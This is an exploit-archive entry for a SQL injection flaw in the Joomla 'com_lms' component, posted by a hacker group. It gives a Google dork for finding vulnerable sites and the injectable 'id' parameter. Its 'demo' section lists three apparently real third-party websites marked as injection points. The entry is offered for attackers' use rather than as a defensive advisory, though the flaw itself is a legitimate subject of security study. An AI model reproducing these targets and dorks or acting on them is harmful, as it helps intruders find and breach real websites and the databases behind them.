Joomla Components lms SQL Injection Vulnerability

2013-02-03T00:00:00
ID 1337DAY-ID-20286
Type zdt
Reporter KinG Of PiraTeS
Modified 2013-02-03T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            ================================================================================
____ _    _    ____ _  _    ____ _  _ ___  ____ ____ 
|__| |    |    |__| |__|    |__| |_/  |__] |__| |__/ 
|  | |___ |___ |  | |  |    |  | | \_ |__] |  | |  \ 
                                                     
================================================================================
####
# Exploit Title: Joomla Components lms SQL Injection Vulnerability
# Author: KinG Of PiraTeS
# GooGle+ : http://gplus.to/HouSseM
# Facebook Profile: www.fb.me/cr4ck3d
# Facebeook Page : www.fb.me/serial.crack
# Facebeook Page : www.fb.me/Cars2Luxe
# E-mail: [email protected] / [email protected]
# Web Site : www.1337day.com | www.inj3ct0rs.com 
# Category:: webapps
# Google Dork: inurl:"index.php?option=com_lms"
# platform : php
# Vendor: http://www.joomlalms.com/
# Download : Search Here > http://extensions.joomla.org/ <
# Version: All vErsion
# Security Risk : High
# Tested on: [Windows 7 Edition Intégrale 64bit ]
####


##
# | >> --------+++=[ Dz Offenders Cr3w ]=+++-------- << |
# | > Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3   |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * Dr.55h |
# | * ------>  KinG Of PiraTeS * The g0bl!n <-------- * | 
# | ------------------------------------------------- < |
###

# 
1)Introduction
2)Vulnerability Description
3)Exploit

>> ----------------------------------------------------------------
1)Introduction
==============
2)Vulnerability Description
===========================

U can inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. 
Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. 
With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

3)Exploit
=========

http://Localhost/{Path}/index.php?option=com_lms&controller=statedetail&id=-1


[~] P0c [~] :
============

Vuln file in :

http://Localhost/{Path}/index.php?option=com_lms&controller=statedetail&id=[Number]  <<-----|

[~] D3m0 [~] :
=============

http://php.esoftech.org/kanerma/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]
http://www.senmedical.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]
http://www.najbaro.com/index.php?option=com_lms&controller=statedetail&id=1[Inj3ct Here]


Many Websites are Affected On SQL inJection & Path désclosure  
.
.
.

####

Peace From Algeria

####
=================================**Algerians Hackers**===============================================
# Greets To : 
   KedAns-Dz & Caddy-Dz & kalashinkov3 **All Algerians Hackers** , Kondamne ,  errajol ettayeb
   (exploit-id.com) , (1337day.com) , (Sec4ever.com) , (h4ckforu.com) , (alboraaq.com)
   All My Friendz: Hanixpo , Caddy-Dz , Indoushka , Jago-dz ,saoucha , BriscO-Dz
   Over-X , Kha&miX ,Ev!LsCr!pT_Dz , T0xic ,TrOon , Tn_Scorpion , ..others ?___?
=====================================================================================================

#  0day.today [2018-04-02]  #